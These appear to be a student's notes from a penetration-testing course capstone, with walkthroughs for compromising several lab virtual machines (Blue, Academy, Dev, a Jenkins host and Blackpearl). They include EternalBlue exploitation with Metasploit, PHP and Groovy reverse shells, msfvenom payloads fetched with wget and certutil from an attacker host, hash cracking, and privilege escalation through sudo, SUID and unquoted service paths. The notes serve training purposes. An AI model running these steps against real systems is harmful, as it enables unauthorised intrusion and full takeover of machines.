-----------------------------------------------------------INTRODUCTION------------------------------------------------
Course Capstone (old and new capstone)

*gonna learn about privilege escalation
*we have low privileges and we need to escalate our privileges to the highest level.
*talk about windows and linux privilege escalation courses

----------------------------------------------------------------SET UP - BLUE-----------------------------------------------
setting up the virutal machine for practice using virutal box
*settings to network (NAT)
*check that we can communicate with the machine using PING cmd.

----------------------------------------------------------------WALKTHROUGH - BLUE----------------------------------------------

THE MACHINE IP ADDRESS IS 192.168.138.135

$nmap -p- -T4 192.168.138.135

(open ports 135,139,445) (win 7 ultimate 7601 service)

With metasploit:

$msfconsole
$search eternalblue
$use 1
$options
$set rhosts 192.168.138.135
$run

$use 3
$options
$set rhosts 192.168.138.135
$check
$set payload windows/X64/meterpreter/reverse_tcp
$options
$set lhosts 192.168.138.128 (our ip)
$run

Gained access

MANUAL METHOD:

ETERNALBLUE github repo 3ndG4me/AutoBlue-MS17

------------------------------------------------------------------SETUP - ACADEMY-----------------------------------------------------
IMPORT the machine in the virutal box

----------------------------------------------------------------WALKTHROUGH - ACADEMY---------------------------------------------
0S:Debian GNU/Linux 10 academy

$ip a
$nmap -A -p- -T4 192.168.138.129

open ports: (21(ftp),22,80(apache 2.4.38))

$ftp 192.168.138.129 (username:anonymous)
$get note.txt
 
Builtin tool:hash-identifier
(hashcat-crack-md5-hashes)

$locate rockyou.txt
create the file with a hash
$hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt

$dirb http://192.168.138.129
$ffuf -w /usr/share/wordlists/dirbuster/directory.txt:FUZZ -u http://192.168.138.129/

1.found a login page , we got a credentials in note.txt through ftp ,and found profile image upload options
the website written in php.
2.get a reverse shell for php and upload the shell file.
3.got reverse shell.
4.using LinPeas - Linux Privilege Escalation Awesome Script checks path for PE.

running local host web server
python3 -m http.server 80

IN ATTACKER MACHINE , reverse shell:
$cd /tmp
$pwd
$wget http://192.168.138.131/linpeas.sh
$ls
$chmod +x linepeas.sh
$./linpeas.sh

found mysql password of grimmi user , used ssh to exploit
$ssh grimmie@192.168.138.129

$systemctl list-timers

download pspy
$wget http://192.168.138.131/pspy64
$ls
$chmod +x pspy64
$./pspy64

find a reverse shell for bash oneliner , 
in sttacker machine: 
$nc -nvlp 8081

in target machine:
execute the reverse shell ip.

Now you become a root user.

------------------------------------------------------WALKTHROUGH - DEV----------------------------------------------------------------

Vuln machine ip : 192.168.138.137

$nmap -A -T4 -p- 192.168.138.137

open ports (22,80,111,2049,8080,42417,45263,59045,59831)

80 - bolt-installation error page (linux machine)
8080 - phpinfo page

$ffuf -w wordlist:FUZZ -u http://192.168.138.137/FUZZ
$ffuf -w wordlist:FUZZ -u http://192.168.138.137:8080/FUZZ

$Sshowmount -e 192.168.138.137
$mkdir /mnt/dev
$mount -t nfs 192.168.138.137:/srv/nfs /mnt/dev
$unzip save.zip

$apt install fcrackzip
$fcrackzip -v -u D -p wordlist save.zip (found password to open save.zip)

#ssh -i id_rsa jp@192.168.138.137 (found this using save.zip)

Boltwire website vulnerable to local file inclusion

$ssh -i id_rsa jeanpaul@192.168.138.137 (password i_love_java)
$history

$sudo -l
only /usr/bin/zip able to access

gtfobins used to elevate the sudo users to root
go to zip , copy and paste the command

$id
$cd /root
$found the flag

------------------------------------------------------------------------------

vuln machine ip : 192.168.138.138

open ports: (7680,8080)

8080 - Running jenkins

using burpsuite , brute force the username and password.(use cluster bomb intruder)

logged into jenkins account

Reverse shell using groovy script console

got the shell

$systeminfo (Windows machine)

Winpeas - Windows Privilege Escalation

host a transfer folder to move the file to target machine

$python3 -m http.server 80

in target machine:

$certutil.exe -urlcache -f 192.168.138.131/winpeas.exe winpeas.exe
$winpeas.exe

exploiting unenquoted path in the c drive of the windows system

Attacker machine
$msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.138.131 LPORT=7777 -f exe > wise.exe
$python3 -m http.server 80

get into c drive/wise file

$certutil -urlcache -f http://192.168.138.131/wise.exe wise.exe

to stop wisebootassistant
$sc stop WiseBootAssistant 
$sc query wisebootAssistant

$start wisebootassistant

we will get the system

----------------------------------------------------WALKTHROUGH - BLACKPERL-----------------------------------------------
VULN MACHINE : 192.168.138.130

$nmap -T4 -A -p- 192.168.138.130

open ports:(22,53,80)

80 -nignx 

$ffuf -w wordlist:fuzz -u http://192.168.138.130/FUZZ

$dnsrecon -r 127.0.01/24 -n 192.168.138.130 -d domain

dns ptr blackpearl.tcm

$nano /etc/hosts

creating dns for blackpearl.tcm

now go to blackpearl.tcm

$ffuf -w wordlist:fuzz -u http://blackpearl.tcm/FUZZ

navigate cms 2.8 exploit using metasploit

got meterpreter  

$shell

netsec.ws (spawning a TTY shell)

copy the python code

in attacker machine:
$python3 -m http.server 80

target machine:

$cd /tmp
$weget http://192.168.138.131/linpeas.sh linepeas.sh
$chmod +x linpeas.sh
$./linpeas.sh

suid found
gtfobins website

$/usr/bin/php7.3 (code for shell)

Got the flag
--------------------------------------------------------------------------------------------------------------------





